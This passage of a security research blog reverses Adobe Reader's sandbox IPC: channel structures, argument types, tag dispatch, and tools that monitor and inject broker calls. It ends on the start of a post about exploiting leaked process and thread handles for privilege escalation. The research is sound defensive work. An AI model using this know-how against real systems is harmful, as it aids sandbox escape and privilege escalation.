MCpySrcPtr = (unsigned __int64 *)(MsgBuf + 80);
if ( MsgBuf == -80 )
  goto LABEL_380;

MCpySrc = *MCpySrcPtr;
if ( *MCpySrcPtr )
{
  // check if the offset is less than the MsgBufSize and if it's at least 8 bytes past the src pointer struct (contains size words)
  if ( MCpySrc > (unsigned int)_MsgBufSize || (unsigned int)_MsgBufSize - MCpySrc < 8 )
    goto LABEL_380;
  
  // transform offset to pointer
  *MCpySrcPtr = MCpySrc + MsgBuf;
}

It seems messier this way, but is probably just compiler optimization. MCpySrc is the address of the source struct, which is:

typedef struct SrcPtr {
  DWORD offset;
  WORD SizeHigh;
  WORD SizeLow;
};

Size is likely split out for additional functionality in other LPC functions, but I didn’t bother figuring out why. The destination offset/pointer is resolved in a similar fashion.

Funny enough, the GdiPrinterThunk_Unpatched really is unpatched; the vulnerable memcpy code lives on.

References

[0] https://bugs.chromium.org/p/project-zero/issues/detail?id=2096
[1] https://whereisk0shl.top/post/the_story_of_cve_2021_1648
[2] https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1648
[3] https://securelist.com/operation-powerfall-cve-2020-0986-and-variants/98329/
[4] https://byteraptors.github.io/windows/exploitation/2020/05/24/sandboxescape.html
[5] https://github.com/scwuaptx/LazyFragmentationHeap/blob/master/LazyFragmentationHeap_slide.pdf
[6] https://www.slideshare.net/AngelBoy1/windows-10-nt-heap-exploitation-english-version
[7] https://twitter.com/scwuaptx
[8] https://github.com/hatRiot/bugs/tree/master/cve20211648

Digging the Adobe Sandbox - IPC Internals

7 August 2020 at 21:10

This post kicks off a short series into reversing the Adobe Reader sandbox. I initially started this research early last year and have been working on it off and on since. This series will document the Reader sandbox internals, present a few tools for reversing/interacting with it, and a description of the results of this research. There may be quite a bit of content here, but I’ll be doing a lot of braindumping. I find posts that document process, failure, and attempt to be far more insightful as a researcher than pure technical result.

I’ve broken this research up into two posts. Maybe more, we’ll see. The first here will detail the internals of the sandbox and introduce a few tools developed, and the second will focus on fuzzing and the results of that effort.

This post focuses primarily on the IPC channel used to communicate between the sandboxed process and the broker. I do not delve into how the policy engine works or many of the restrictions enabled.

Introduction

This is by no means the first dive into the Adobe Reader sandbox. Here are a few prior examples of great work:

2011 – A Castle Made of Sand (Richard Johnson)
2011 – Playing in the Reader X Sandbox (Paul Sabanal and Mark Yason)
2012 – Breeding Sandworms (Zhenhua Liu and Guillaume Lovet)
2013 – When the Broker is Broken (Peter Vreugdenhil)

Breeding Sandworms was a particularly useful introduction to the sandbox, as it describes in some detail the internals of transactions and how they approached fuzzing the sandbox. I’ll detail my approach and improvements in part two of this series.

In addition, the ZDI crew of Abdul-Aziz Hariri, et al. have been hammering on the Javascript side of things for what seems like forever (Abusing Adobe Reader’s Javascript APIs) and have done some great work in this area.

After evaluating existing research, however, it seemed like there was more work to be done in a more open source fashion. Most sandbox escapes in Reader these days opt instead to target Windows itself via win32k/dxdiag/etc and not the sandbox broker. This makes some sense, but leaves a lot of attack surface unexplored.

Note that all research was done on Acrobat Reader DC 20.6.20034 on a Windows 10 machine. You can fetch installers for old versions of Adobe Reader here. I highly recommend bookmarking this. One of my favorite things to do on a new target is pull previous bugs and affected versions and run through root cause and exploitation.

Sandbox Internals Overview

Adobe Reader’s sandbox is known as protected mode and is on by default, but can be toggled on/off via preferences or the registry. Once Reader launches, a child process is spawned under low integrity and a shared memory section mapped in. Inter-process communication (IPC) takes place over this channel, with the parent process acting as the broker.

Adobe actually published some of the sandbox source code to Github over 7 years ago, but it does not contain any of their policies or modern tag interfaces. It’s useful for figuring out variables and function names during reversing, and the source code is well written and full of useful comments, so I recommend pulling it up.

Reader uses the Chromium sandbox (pre Mojo), and I recommend the existing Chromium sandbox documentation for the specifics here.

These days it’s known as the “legacy IPC” and has been replaced by Mojo in Chrome. Reader actually uses Mojo to communicate between its RdrCEF (Chromium Embedded Framework) processes which handle cloud connectivity, syncing, etc. It’s possible Adobe plans to replace the broker legacy API with Mojo at some point, but this has not been announced/released yet.

We’ll start by taking a brief look at how a target process is spawned, but the main focus of this post will be the guts of the IPC mechanisms in play. Execution of the child process first begins with BrokerServicesBase::SpawnTarget. This function crafts the target process and its restrictions. Some of these are described here in greater detail, but they are as follows:

1. Create restricted token
 - via `CreateRestrictedToken`
 - Low integrity or AppContainer if available
2. Create restricted job object
 - No RW to clipboard
 - No access to user handles in other processes
 - No message broadcasts
 - No global hooks
 - No global atoms table access
 - No changes to display settings
 - No desktop switching/creation
 - No ExitWindows calls
 - No SystemParametersInfo
 - One active process
 - Kill on close/unhandled exception

From here, the policy manager enforces interceptions, handled by the InterceptionManager, which hooks various Win32 functions in the target process and rewires them to the broker. According to documentation, this is not for security, but rather:

[..] designed to provide compatibility when code inside the sandbox cannot be modified to cope with sandbox restrictions. To save unnecessary IPCs, policy is also evaluated in the target process before making an IPC call, although this is not used as a security guarantee but merely a speed optimization.

From here we can now take a look at how the IPC mechanisms between the target and broker process actually work.

The broker process is responsible for spawning the target process, creating a shared memory mapping, and initializing the requisite data structures. This shared memory mapping is the medium in which the broker and target communicate and exchange data. If the target wants to make an IPC call, the following happens at a high level:

  1. The target finds a channel in a free state
  2. The target serializes the IPC call parameters to the channel
  3. The target then signals an event object for the channel (ping event)
  4. The target waits until a pong event is signaled

At this point, the broker executes ThreadPingEventReady, the IPC processor entry point, where the following occurs:

  1. The broker deserializes the call arguments in the channel
  2. Sanity checks the parameters and the call
  3. Executes the callback
  4. Writes the return structure back to the channel
  5. Signals that the call is completed (pong event)

There are 16 channels available for use, meaning that the broker can service up to 16 concurrent IPC requests at a time. The following diagram describes a high level view of this architecture:

From the broker’s perspective, a channel can be viewed like so:

In general, this describes what the IPC communication channel between the broker and target looks like. In the following sections we’ll take a look at these in more technical depth.

IPC Internals

The IPC facilities are established via TargetProcess::Init, and is really what we’re most interested in. The following snippet describes how the shared memory mapping is created and established between the broker and target:

  DWORD shared_mem_size = static_cast<DWORD>(shared_IPC_size +
                                             shared_policy_size);
  shared_section_.Set(::CreateFileMappingW(INVALID_HANDLE_VALUE, NULL,
                                           PAGE_READWRITE | SEC_COMMIT,
                                           0, shared_mem_size, NULL));
  if (!shared_section_.IsValid()) {
    return ::GetLastError();
  }

  DWORD access = FILE_MAP_READ | FILE_MAP_WRITE;
  base::win::ScopedHandle target_shared_section;
  if (!::DuplicateHandle(::GetCurrentProcess(), shared_section_,
                         sandbox_process_info_.process_handle(),
                         target_shared_section.Receive(), access, FALSE, 0)) {
    return ::GetLastError();
  }

  void* shared_memory = ::MapViewOfFile(shared_section_,
                                        FILE_MAP_WRITE|FILE_MAP_READ,
                                        0, 0, 0);

The calculated shared_mem_size in the source code here comes out to 65536 bytes, which isn’t right. The shared section is actually 0x20000 bytes in modern Reader binaries.

Once the mapping is established and policies copied in, the SharedMemIPCServer is initialized, and this is where things finally get interesting. SharedMemIPCServer initializes the ping/pong events for communication, creates channels, and registers callbacks.

The previous architecture diagram provides an overview of the structures and layout of the section at runtime. In short, a ServerControl is a broker-side view of an IPC channel. It contains the server side event handles, pointers to both the channel and its buffer, and general information about the connected IPC endpoint. This structure is not visible to the target process and exists only in the broker.

A ChannelControl is the target process version of a ServerControl; it contains the target’s event handles, the state of the channel, and information about where to find the channel buffer. This channel buffer is where the CrossCallParams can be found as well as the call return information after a successful IPC dispatch.

Let’s walk through what an actual request looks like. Making an IPC request requires the target to first prepare a CrossCallParams structure. This is defined as a class, but we can model it as a struct:

const size_t kExtendedReturnCount = 8;

union MultiType {
  uint32 unsigned_int;
  void* pointer;
  HANDLE handle;
  ULONG_PTR ulong_ptr;
};

struct CrossCallReturn {
  uint32 tag_;
  uint32 call_outcome;
  union {
    NTSTATUS nt_status;
    DWORD win32_result;
  };

  HANDLE handle;
  uint32 extended_count;
  MultiType extended[kExtendedReturnCount];
};

struct CrossCallParams {
  uint32 tag_;
  uint32 is_in_out_;
  CrossCallReturn call_return;
  size_t params_count_;
};

I’ve also gone ahead and defined a few other structures needed to complete the picture. Note that the return structure, CrossCallReturn, is embedded within the body of the CrossCallParams.

There’s a great ASCII diagram provided in the sandbox source code that’s highly instructive, and I’ve duplicated it below:

// [ tag                4 bytes]
// [ IsOnOut            4 bytes]
// [ call return       52 bytes]
// [ params count       4 bytes]
// [ parameter 0 type   4 bytes]
// [ parameter 0 offset 4 bytes] ---delta to ---\
// [ parameter 0 size   4 bytes]                |
// [ parameter 1 type   4 bytes]                |
// [ parameter 1 offset 4 bytes] ---------------|--\
// [ parameter 1 size   4 bytes]                |  |
// [ parameter 2 type   4 bytes]                |  |
// [ parameter 2 offset 4 bytes] ----------------------\
// [ parameter 2 size   4 bytes]                |  |   |
// |---------------------------|                |  |   |
// | value 0     (x bytes)     | <--------------/  |   |
// | value 1     (y bytes)     | <-----------------/   |
// |                           |                       |
// | end of buffer             | <---------------------/
// |---------------------------|

A tag is a dword indicating which function we’re invoking (just a number between 1 and approximately 255, depending on your version). This is handled server side dynamically, and we’ll explore that further later on.

Each parameter is then sequentially represented by a ParamInfo structure:

struct ParamInfo {
  ArgType type_;
  ptrdiff_t offset_;
  size_t size_;
};

The offset is the delta value to a region of memory somewhere below the CrossCallParams structure. This is handled in the Chromium source code via the ptrdiff_t type.

Let’s look at a call in memory from the target’s perspective. Assume the channel buffer is at 0x2a10134:

0:009> dd 2a10000+0x134
02a10134  00000003 00000000 00000000 00000000
02a10144  00000000 00000000 000002cc 00000001
02a10154  00000000 00000000 00000000 00000000
02a10164  00000000 00000000 00000000 00000007
02a10174  00000001 000000a0 00000086 00000002
02a10184  00000128 00000004 00000002 00000130
02a10194  00000004 00000002 00000138 00000004
02a101a4  00000002 00000140 00000004 00000002

0x2a10134 shows we’re invoking tag 3, which carries 7 parameters (0x2a10170). The first argument is type 0x1 (we’ll describe types later on), is at delta offset 0xa0, and is 0x86 bytes in size. Thus:

0:009> dd 2a10000+0x134+0xa0
02a101d4  003f005c 005c003f 003a0043 0055005c
02a101e4  00650073 00730072 0062005c 0061006a
02a101f4  006a0066 0041005c 00700070 00610044
02a10204  00610074 004c005c 0063006f 006c0061
02a10214  006f004c 005c0077 00640041 0062006f
02a10224  005c0065 00630041 006f0072 00610062
02a10234  005c0074 00430044 0052005c 00610065
02a10244  00650064 004d0072 00730065 00610073
0:009> du 2a10000+0x134+0xa0
02a101d4  "\??\C:\Users\bjaff\AppData\Local"
02a10214  "Low\Adobe\Acrobat\DC\ReaderMessa"
02a10254  "ges"

This shows the delta of the parameter data and, based on the parameter type, we know it’s a unicode string.
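
To tie the layout together, here’s a small sketch that walks the parameter descriptors of a CrossCallParams sitting in a channel buffer. The field offsets follow the diagram above (tag at 0x0, is_in_out at 0x4, call return at 0x8, params count at 0x3c, descriptors from 0x40); the struct name is mine, not Chromium’s:

#include <windows.h>
#include <stdio.h>

// One descriptor per parameter, laid out sequentially after params_count.
typedef struct {
    DWORD type_;
    DWORD offset_; // delta from the start of the CrossCallParams
    DWORD size_;
} ParamDesc;

// cross_call = section base + channel_base
void DumpParams(BYTE *cross_call)
{
    DWORD count = *(DWORD *)(cross_call + 0x3c);
    ParamDesc *p = (ParamDesc *)(cross_call + 0x40);

    for (DWORD i = 0; i < count; i++)
        printf("param %lu: type=%lu size=%lu data=%p\n",
               i, p[i].type_, p[i].size_, cross_call + p[i].offset_);
}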

With this information, we can craft a buffer targeting IPC tag 3 and move onto sending it. To do this, we require the IPCControl structure. This is a simple structure defined at the start of the IPC shared memory section:

struct IPCControl {
    size_t channels_count;
    HANDLE server_alive;
    ChannelControl channels[1];
};

And in the IPC shared memory section:

0:009> dd 2a10000
02a10000  0000000f 00000088 00000134 00000001
02a10010  00000010 00000014 00000003 00020134

So we have 16 channels, a handle to server_alive, and the start of our ChannelControl array.

The server_alive handle is a mutex used to signal if the server has crashed. It’s used during tag invocation in SharedMemIPCClient::DoCall, which we’ll describe later on. For now, assume that if we WaitForSingleObject on this and it returns WAIT_ABANDONED, the server has crashed.
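
In other words, a sketch mirroring that check:

#include <windows.h>

// Zero-timeout wait on server_alive: WAIT_ABANDONED means the broker died
// while holding the mutex, so the channel state can't be trusted.
BOOL BrokerIsAlive(HANDLE server_alive)
{
    return WaitForSingleObject(server_alive, 0) != WAIT_ABANDONED;
}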

ChannelControl is a structure that describes a channel, and is again defined as:

struct ChannelControl {
  size_t channel_base;
  volatile LONG state;
  HANDLE ping_event;
  HANDLE pong_event;
  uint32 ipc_tag;
};

The channel_base describes the channel’s buffer, ie. where the CrossCallParams structure can be found. This is an offset from the base of the shared memory section.

state is an enum that describes the state of the channel:

enum ChannelState {
  kFreeChannel = 1,
  kBusyChannel,
  kAckChannel,
  kReadyChannel,
  kAbandonnedChannel
};

The ping and pong events are, as previously described, used to signal to the opposite endpoint that data is ready for consumption. For example, when the client has written out its CrossCallParams and ready for the server, it signals:

  DWORD wait = ::SignalObjectAndWait(channel[num].ping_event,
                                     channel[num].pong_event,
                                     kIPCWaitTimeOut1,
                                     FALSE);

When the server has completed processing the request, the pong_event is signaled and the client reads back the call result.

A channel is fetched via SharedMemIPCClient::LockFreeChannel, which is invoked when GetBuffer is called. This simply identifies a channel in the IPCControl array wherein state == kFreeChannel, and sets it to kBusyChannel. With a channel, we can now write out our CrossCallParams structure to the shared memory buffer. Our target buffer begins at channel->channel_base.
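
A minimal sketch of that acquisition, using the structures defined above (Chromium’s implementation is equivalent in spirit):

#include <windows.h>

// Scan the channel array for a free entry and atomically claim it by
// flipping state from kFreeChannel to kBusyChannel. Returns the channel
// index, or -1 if all channels are busy.
LONG LockFreeChannel(IPCControl *ipc)
{
    for (size_t i = 0; i < ipc->channels_count; i++) {
        if (InterlockedCompareExchange(&ipc->channels[i].state,
                                       kBusyChannel,
                                       kFreeChannel) == kFreeChannel)
            return (LONG)i;
    }
    return -1;
}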

Writing out the CrossCallParams has a few nuances. First, the number of actual parameters is NUMBER_PARAMS+1. According to the source:

// Note that the actual number of params is NUMBER_PARAMS + 1
// so that the size of each actual param can be computed from the difference
// between one parameter and the next down. The offset of the last param
// points to the end of the buffer and the type and size are undefined.

This can be observed in the CopyParamIn function:

param_info_[index + 1].offset_ = Align(param_info_[index].offset_ +
                                            size);
param_info_[index].size_ = size;
param_info_[index].type_ = type;

Note the offset written is the offset for index+1. In addition, this offset is aligned. This is a pretty simple function that byte aligns the delta inside the channel buffer:

// Increases |value| until there is no need for padding given the 2*pointer
// alignment on the platform. Returns the increased value.
// NOTE: This might not be good enough for some buffer. The OS might want the
// structure inside the buffer to be aligned also.
size_t Align(size_t value) {
  size_t alignment = sizeof(ULONG_PTR) * 2;
  return ((value + alignment - 1) / alignment) * alignment;
}

Because the Reader process is x86, the alignment is always 8.

The pseudo-code for writing out our CrossCallParams can be distilled into the following:

write_uint(buffer,     tag);
write_uint(buffer+0x4, is_in_out);

// reserve 52 bytes for CrossCallReturn
write_crosscall_return(buffer+0x8);

write_uint(buffer+0x3c, param_count);

// calculate initial delta 
delta = ((param_count + 1) * 12) + 12 + 52;

// write out the first argument's offset 
write_uint(buffer + (0x4 * (3 * 0 + 0x11)), delta);

for idx in range(param_count):
    
    write_uint(buffer + (0x4 * (3 * idx + 0x10)), type);
    write_uint(buffer + (0x4 * (3 * idx + 0x12)), size);

    // ...write out argument data. This varies based on the type

    // calculate new delta
    delta = Align(delta + size)
    write_uint(buffer + (0x4 * (3 * (idx+1) + 0x11)), delta);

// finally, write the tag out to the ChannelControl struct
write_uint(channel_control->tag, tag);

Once the CrossCallParams structure has been written out, the sandboxed process signals the ping_event and the broker is triggered.

Broker side handling is fairly straightforward. The server registers a ping_event handler during SharedMemIPCServer::Init:

 thread_provider_->RegisterWait(this, service_context->ping_event,
                                ThreadPingEventReady, service_context);

RegisterWait is just a thread pool wrapper around a call to RegisterWaitForSingleObject.

The ThreadPingEventReady function marks the channel as kAckChannel, fetches a pointer to the provided buffer, and invokes InvokeCallback. Once this returns, it copies the CrossCallReturn structure back to the channel and signals the pong_event.

InvokeCallback parses out the buffer and handles validation of data, at a high level (ensures strings are strings, buffers and sizes match up, etc.). This is probably a good time to document the supported argument types. There are 10 types in total, two of which are placeholders:

ArgType = {
    0: "INVALID_TYPE",
    1: "WCHAR_TYPE", 
    2: "ULONG_TYPE",
    3: "UNISTR_TYPE", # treated same as WCHAR_TYPE
    4: "VOIDPTR_TYPE",
    5: "INPTR_TYPE",
    6: "INOUTPTR_TYPE",
    7: "ASCII_TYPE",
    8: "MEM_TYPE", 
    9: "LAST_TYPE" 
}

These are taken from internal_types, but you’ll notice there are two additional types, ASCII_TYPE and MEM_TYPE, which are unique to Reader. ASCII_TYPE is, as expected, a simple 7-bit ASCII string. MEM_TYPE is a memory structure used by the broker to read data out of the sandboxed process, i.e. for more complex types that can’t be trivially passed via the API. It’s additionally used for data blobs, such as PNG images, enhanced-format datafiles, and more.

Some of these types should be self-explanatory; WCHAR_TYPE is naturally a wide char, ASCII_TYPE an ascii string, and ULONG_TYPE a ulong. Let’s look at a few of the non-obvious types, however: VOIDPTR_TYPE, INPTR_TYPE, INOUTPTR_TYPE, and MEM_TYPE.

Starting with VOIDPTR_TYPE, this is a standard type in the Chromium sandbox so we can just refer to the source code. SharedMemIPCServer::GetArgs calls GetParameterVoidPtr. Simply, once the value itself is extracted it’s cast to a void ptr:

*param = *(reinterpret_cast<void**>(start));

This allows tags to reference objects and data within the broker process itself. An example might be NtOpenProcessToken, whose first parameter is a handle to the target process. This would be retrieved first by a call to OpenProcess, handed back to the child process, and then supplied in any future calls that may need to use the handle as a VOIDPTR_TYPE.

In the Chromium source code, INPTR_TYPE is extracted as a raw value via GetRawParameter and no additional processing is performed. However, in Adobe Reader, it’s actually extracted in the same way INOUTPTR_TYPE is.

INOUTPTR_TYPE is wrapped as a CountedBuffer and may be written to during the IPC call. For example, if CreateProcessW is invoked, the PROCESS_INFORMATION pointer will be of type INOUTPTR_TYPE.

The final type is MEM_TYPE, which is unique to Adobe Reader. We can define the structure as:

struct MEM_TYPE {
  HANDLE hProcess;
  DWORD lpBaseAddress;
  SIZE_T nSize;
};

As mentioned, this type is primarily used to transfer data buffers to and from the broker process. It seems crazy. Each tag is responsible for performing its own validation of the provided values before they’re used in any ReadProcessMemory/WriteProcessMemory call.
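
To illustrate the burden this places on each handler, here’s a hypothetical broker-side helper of my own (not Reader’s code) consuming a MEM_TYPE argument; nothing upstream validates any of these fields:

#include <windows.h>

// Hypothetical broker-side read of a MEM_TYPE argument. The tag handler
// must bound nSize itself before the cross-process read; nothing upstream
// checks hProcess, lpBaseAddress, or nSize.
BOOL ReadMemArg(const MEM_TYPE *arg, void *out, SIZE_T cap)
{
    SIZE_T read = 0;

    if (!arg->lpBaseAddress || arg->nSize > cap) // tag-specific sanity check
        return FALSE;

    return ReadProcessMemory(arg->hProcess,
                             (LPCVOID)(ULONG_PTR)arg->lpBaseAddress,
                             out, arg->nSize, &read) && read == arg->nSize;
}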

Once the broker has parsed out the passed arguments, it fetches the context dispatcher and identifies our tag handler:

ContextDispatcher = *(int (__thiscall ****)(_DWORD, int *, int *))(Context + 24);// fetch dispatcher function from Server control
target_info = Context + 28;
handler = (**ContextDispatcher)(ContextDispatcher, &ipc_params, &callback_generic);// PolicyBase::OnMessageReady

The handler is fetched from PolicyBase::OnMessageReady, which winds up calling Dispatcher::OnMessageReady. This is a pretty simple function that crawls the registered IPC tag list for the correct handler. We finally hit InvokeCallbackArgs, unique to Reader, which invokes the handler with the proper argument count:

switch ( ParamCount )
  {
    case 0:
      v7 = callback_generic(_this, CrossCallParamsEx);
      goto LABEL_20;
    case 1:
      v7 = ((int (__thiscall *)(void *, int, _DWORD))callback_generic)(_this, CrossCallParamsEx, *args);
      goto LABEL_20;
    case 2:
      v7 = ((int (__thiscall *)(void *, int, _DWORD, _DWORD))callback_generic)(_this, CrossCallParamsEx, *args, args[1]);
      goto LABEL_20;
    case 3:
      v7 = ((int (__thiscall *)(void *, int, _DWORD, _DWORD, _DWORD))callback_generic)(
             _this,
             CrossCallParamsEx,
             *args,
             args[1],
             args[2]);
      goto LABEL_20;

[...]

In total, Reader supports tag functions with up to 17 arguments. I have no idea why that would be necessary, but it is. Additionally note the first two arguments to each tag handler: context handler (dispatcher) and CrossCallParamsEx. This last structure is actually the broker’s version of a CrossCallParams with more paranoia.

A single function is used to register IPC tags, called from a single initialization function, making it relatively easy for us to scrape them all at runtime. Pulling out all of the IPC tags can be done both statically and dynamically; the former is far easier, the latter is more accurate. I’ve implemented a static generator using IDAPython, available in this project’s repository (ida_find_tags.py), and can be used to pull all supported IPC tags out of Reader along with their parameters. This is not going to be wholly indicative of all possible calls, however. During initialization of the sandbox, many feature checks are performed to probe the availability of certain capabilities. If these fail, the tag is not registered.

Tags are given a handle to CrossCallParamsEx, which gives them access to the CrossCallReturn structure. This is defined in the Chromium source and, repeated from above, looks like:

struct CrossCallReturn {
  uint32 tag_;
  uint32 call_outcome;
  union {
    NTSTATUS nt_status;
    DWORD win32_result;
  };

  HANDLE handle;
  uint32 extended_count;
  MultiType extended[kExtendedReturnCount];
};

This 52-byte structure is embedded in the CrossCallParams transferred by the sandboxed process. Once the tag has returned from execution, the following occurs:

 if (error) {
    if (handler)
      SetCallError(SBOX_ERROR_FAILED_IPC, call_result);
  } else {
    memcpy(call_result, &ipc_info.return_info, sizeof(*call_result));
    SetCallSuccess(call_result);
    if (params->IsInOut()) {
      // Maybe the params got changed by the broker. We need to update the
      // memory section.
      memcpy(ipc_buffer, params.get(), output_size);
    }
  }

and the sandboxed process can finally read out its result. Note that this mechanism does not allow for the exchange of more complex types, hence the availability of MEM_TYPE. The final step is signaling the pong_event, completing the call and freeing the channel.

Tags

Now that we understand how the IPC mechanism itself works, let’s examine the implemented tags in the sandbox. Tags are registered during initialization by a function we’ll call InitializeSandboxCallback. This is a large function that handles allocating sandbox tag objects and invoking their respective initializers. Each initializer uses a function, RegisterTag, to construct and register individual tags. A tag is defined by a SandTag structure:

typedef struct SandTag {
  DWORD IPCTag;
  ArgType Arguments[17];
  LPVOID Handler;
} SandTag;

The Arguments array is initialized to INVALID_TYPE and ignored if the tag does not use all 17 slots. Here’s an example of a tag structure:

.rdata:00DD49A8 IpcTag3         dd 3                    ; IPCTag
.rdata:00DD49A8                                         ; DATA XREF: 000190FA↑r
.rdata:00DD49A8                                         ; 00019140↑o ...
.rdata:00DD49A8                 dd 1, 6 dup(2), 0Ah dup(0); Arguments
.rdata:00DD49A8                 dd offset FilesystemDispatcher__NtCreateFile; Handler

Here we see tag 3 with 7 arguments; the first is WCHAR_TYPE and the remaining 6 are ULONG_TYPE. This lines up with what we know to be the NtCreateFile tag handler.

Each tag is part of a group that denotes its behavior. There are 20 groups in total:

SandboxFilesystemDispatcher
SandboxNamedPipeDispatcher
SandboxProcessThreadDispatcher
SandboxSyncDispatcher
SandboxRegistryDispatcher
SandboxBrokerServerDispatcher
SandboxMutantDispatcher
SandboxSectionDispatcher
SandboxMAPIDispatcher
SandboxClipboardDispatcher
SandboxCryptDispatcher
SandboxKerberosDispatcher
SandboxExecProcessDispatcher
SandboxWininetDispatcher
SandboxSelfhealDispatcher
SandboxPrintDispatcher
SandboxPreviewDispatcher
SandboxDDEDispatcher
SandboxAtomDispatcher
SandboxTaskbarManagerDispatcher

The names were extracted either from the Reader binary itself or through correlation with Chromium. Each dispatcher implements an initialization routine that invokes RegisterDispatchFunction for each tag. The number of registered tags will differ depending on the installation, version, features, etc. of the Reader process; SandboxBrokerServerDispatcher, for example, can vary by approximately 25 tags.

Rather than describing each dispatcher in this post, I’ve put together a separate page, which can be found here. This page can be used as a tag reference and has some general information about each. Over time I’ll add my notes on the calls. I’ve additionally pushed the scripts used to extract tag information from the Reader binary and generate the table to the sander repository detailed below.

libread

Over the course of this research, I developed a library and set of tools for examining and exercising the Reader sandbox. The library, libread, was developed to programmatically interface with the broker in real time, allowing for quickly exercising components of the broker and dynamically reversing various facilities. In addition, the library was critical during my fuzzing expeditions. All of the fuzzing tools and data will be available in the next post in this series.

libread is fairly flexible and easy to use, but still pretty rudimentary and, of course, built off of my reverse engineering efforts. It won’t be feature complete nor even completely accurate. Pull requests are welcome.

The library implements all of the notable structures and provides a few helper functions for locating the ServerControl from the broker process. As we’ve seen, a ServerControl is a broker’s view of a channel and is held by the broker alone. This means it’s not somewhere predictable in shared memory, and we’ve got to scan the broker’s memory hunting for it. From the sandbox side there is also a find_memory_map helper for locating the base address of the shared memory map.
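
The hunt itself can be done with VirtualQueryEx and ReadProcessMemory. Below is a minimal sketch; the signature-based scan is a simplified assumption for illustration, and libread’s real heuristics differ:

// scan the broker's committed, writable regions for a known signature
// (e.g. a value we control from the sandbox side); requires <windows.h>,
// <stdlib.h>, and <string.h>
unsigned char *FindServerControl(HANDLE hBroker, const void *sig, SIZE_T sigLen)
{
    MEMORY_BASIC_INFORMATION mbi = { 0 };
    unsigned char *addr = NULL;

    while (VirtualQueryEx(hBroker, addr, &mbi, sizeof(mbi)) == sizeof(mbi)) {
        if (mbi.State == MEM_COMMIT && (mbi.Protect & PAGE_READWRITE)) {
            unsigned char *buf = (unsigned char *)malloc(mbi.RegionSize);
            SIZE_T read = 0;

            if (buf && ReadProcessMemory(hBroker, mbi.BaseAddress, buf, mbi.RegionSize, &read)) {
                for (SIZE_T i = 0; i + sigLen <= read; ++i) {
                    if (memcmp(buf + i, sig, sigLen) == 0) {
                        free(buf);
                        return (unsigned char *)mbi.BaseAddress + i;
                    }
                }
            }
            free(buf);
        }
        addr = (unsigned char *)mbi.BaseAddress + mbi.RegionSize;
    }
    return NULL;
}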

In addition to this library I’m releasing sander. This is a command line tool that consumes libread to provide some useful functionality for inspecting the sandbox:

$ sander.exe -h
[-] sander: [action] <pid>
          -m   -  Monitor mode
          -d   -  Dump channels
          -t   -  Trigger test call (tag 62)
          -c   -  Capture IPC traffic and log to disk
          -h   -  Print this menu

The most useful functionality provided here is the -m flag. This allows one to monitor the IPC calls and their arguments in real time:

$ sander.exe -m 6132
[5184] ESP: 02e1f764    Buffer 029f0134 Tag 266 1 Parameters
      WCHAR_TYPE: _WVWT*&^$
[5184] ESP: 02e1f764    Buffer 029f0134 Tag 34  1 Parameters
      WCHAR_TYPE: C:\Users\bja\desktop\test.pdf
[5184] ESP: 02e1f764    Buffer 029f0134 Tag 247 2 Parameters
      WCHAR_TYPE: C:\Users\bja\desktop\test.pdf
      ULONG_TYPE: 00000000
[5184] ESP: 02e1f764    Buffer 029f0134 Tag 16  6 Parameters
      WCHAR_TYPE: Software\Adobe\Acrobat Reader\DC\SessionManagement
      ULONG_TYPE: 00000040
      VOIDPTR_TYPE: 00000434
      ULONG_TYPE: 000f003f
      ULONG_TYPE: 00000000
      ULONG_TYPE: 00000000
[6020] ESP: 037dfca4    Buffer 029f0134 Tag 16  6 Parameters
      WCHAR_TYPE: cWindowsCurrent
      ULONG_TYPE: 00000040
      VOIDPTR_TYPE: 0000043c
      ULONG_TYPE: 000f003f
      ULONG_TYPE: 00000000
      ULONG_TYPE: 00000000
[5184] ESP: 02e1f764    Buffer 029f0134 Tag 16  6 Parameters
      WCHAR_TYPE: cWin0
      ULONG_TYPE: 00000040
      VOIDPTR_TYPE: 00000434
      ULONG_TYPE: 000f003f
      ULONG_TYPE: 00000000
      ULONG_TYPE: 00000000
[5184] ESP: 02e1f764    Buffer 029f0134 Tag 17  4 Parameters
      WCHAR_TYPE: cTab0
      ULONG_TYPE: 00000040
      VOIDPTR_TYPE: 00000298
      ULONG_TYPE: 000f003f
[2572] ESP: 0335fd5c    Buffer 029f0134 Tag 17  4 Parameters
      WCHAR_TYPE: cPathInfo
      ULONG_TYPE: 00000040
      VOIDPTR_TYPE: 000003cc
      ULONG_TYPE: 000f003f

We’re also able to dump all IPC calls in the broker’s channels (-d), which can help debug threading issues when fuzzing, and trigger a test IPC call (-t). This latter function demonstrates how to send your own IPC calls via libread, as well as allowing you to test out additional tooling.

The last available feature is the -c flag, which captures all IPC traffic and logs the channel buffer to a file on disk. I used this primarily to seed part of my corpus during fuzzing efforts, as well as aid during some reversing efforts. It’s extremely useful for replaying requests and gathering a baseline corpus of real traffic. We’ll discuss this further in forthcoming posts.

That about concludes this initial post. Next up I’ll discuss the various fuzzing strategies used on this unique interface, the frustrating amount of failure, and the bugs shaken out.

Exploiting Leaked Process and Thread Handles

22 August 2019 at 21:10

Over the years I’ve seen and exploited the occasional leaked handle bug. These can be particularly fun to toy with, as the handles aren’t always granted PROCESS_ALL_ACCESS or THREAD_ALL_ACCESS, requiring a bit more ingenuity. This post will address the various access rights assignable to handles and what we can do to exploit them to gain elevated code execution. I’ve chosen to focus specifically on process and thread handles as this seems to be the most common, but surely other objects can be exploited in similar manner.

As background, while this bug can occur under various circumstances, I’ve most commonly seen it manifest when some privileged process opens a handle with bInheritHandle set to true. Once this happens, any child process of this privileged process inherits the handle and all access it grants. As an example, assume a SYSTEM-level process does this:

HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, TRUE, GetCurrentProcessId());

Since it’s allowing the opened handle to be inherited, any child process will gain access to it. If they execute userland code impersonating the desktop user, as a service might often do, those userland processes will have access to that handle.

Existing bugs

There are several public bugs we can point to over the years as examples and inspiration. As per usual, James Forshaw has a fun one from 2016[0] in which he’s able to leak a privileged thread handle out of the secondary logon service with THREAD_ALL_ACCESS. This is the most “open” of permissions, but he exploited it in a novel way that I was unaware of at the time.

Another one from Ivan Fratric exploited[1] a leaked process handle with PROCESS_DUP_HANDLE, which even Microsoft knew was bad. In his Bypassing Mitigations by Attacking JIT Server in Microsoft Edge whitepaper, he identifies the JIT server process mapping memory into the content process; to do this, the JIT process needs a handle to the content process. The content process therefore calls DuplicateHandle on itself with PROCESS_DUP_HANDLE, which can be exploited to obtain a full-access handle.

